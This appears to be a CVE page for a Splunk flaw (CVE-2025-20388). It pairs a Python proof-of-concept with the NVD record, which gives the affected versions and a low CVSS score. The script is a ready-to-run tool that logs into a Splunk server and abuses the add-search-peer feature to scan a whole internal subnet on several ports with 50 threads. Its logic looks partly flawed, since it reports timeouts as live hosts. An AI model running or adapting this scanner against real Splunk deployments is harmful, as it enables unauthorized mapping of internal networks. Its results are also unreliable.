CVE-2025-20388

# CVE-2025-20388 PoC - Splunk Search Peer Enumeration # Requires high privilege user with change_authentication capability import requests import json from concurrent.futures import ThreadPoolExecutor SPLUNK_HOST = "https://target-splunk.example.com" USERNAME = "attacker_user" PASSWORD = "password" def add_search_peer(target_ip, port=8089): """Attempt to add search peer to enumerate internal hosts""" session = requests.Session() login_url = f"{SPLUNK_HOST}/en-US/account/login" # Login to Splunk session.post(login_url, data={ 'username': USERNAME, 'password': PASSWORD, 'cval': 0 }) # Try to add search peer peer_url = f"{SPLUNK_HOST}:{port}/services/search/peers" try: response = session.post(peer_url, data={ 'name': target_ip, 'host': target_ip, 'uri': f"https://{target_ip}:{port}" }, timeout=5) if response.status_code == 200: return {"host": target_ip, "port": port, "status": "alive"} elif "connect failed" in response.text.lower(): return {"host": target_ip, "port": port, "status": "host_reachable"} else: return {"host": target_ip, "port": port, "status": "unknown"} except requests.exceptions.Timeout: return {"host": target_ip, "port": port, "status": "alive"} except Exception as e: return {"host": target_ip, "port": port, "status": "error", "detail": str(e)} def enumerate_internal_network(subnet="192.168.1", ports=[8089, 8088, 8087]): """Enumerate internal IPs and ports""" targets = [f"{subnet}.{i}" for i in range(1, 255)] results = [] with ThreadPoolExecutor(max_workers=50) as executor: for port in ports: futures = [executor.submit(add_search_peer, ip, port) for ip in targets] for future in futures: result = future.result() if result['status'] in ['alive', 'host_reachable']: results.append(result) return results if __name__ == "__main__": print("Enumerating internal network via Splunk search peer feature...") findings = enumerate_internal_network() print(json.dumps(findings, indent=2))

{"cve": {"id": "CVE-2025-20388", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:51.427", "lastModified": "2025-12-05T17:11:26.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.7, and 9.3.2411.116, a user who holds a role that contains the high privilege capability `change_authentication` could enumerate internal IP addresses and network ports when adding new search peers to a Splunk search head in a distributed environment."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.1, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.4, 10.0.2503.7 y 9.3.2411.116, un usuario que posee un rol que contiene la capacidad de alto privilegio 'change_authentication' podría enumerar direcciones IP internas y puertos de red al añadir nuevos pares de búsqueda a una cabeza de búsqueda de Splunk en un entorno distribuido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "259A3F4B-E4D2-48BC-9AE9-C37DE94987D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.116", "matchCriteriaId": "CF33BD17-3D4D-47CC-A917-13AD9C777A47"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.6", "matchCriteriaId": "7BB42067-4A68-44D8-856A-2CC247C440E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.4", "matchCriteriaId": "93DAD528-22AD-49F4-93AB-5E1AB5D7002B"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1207", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}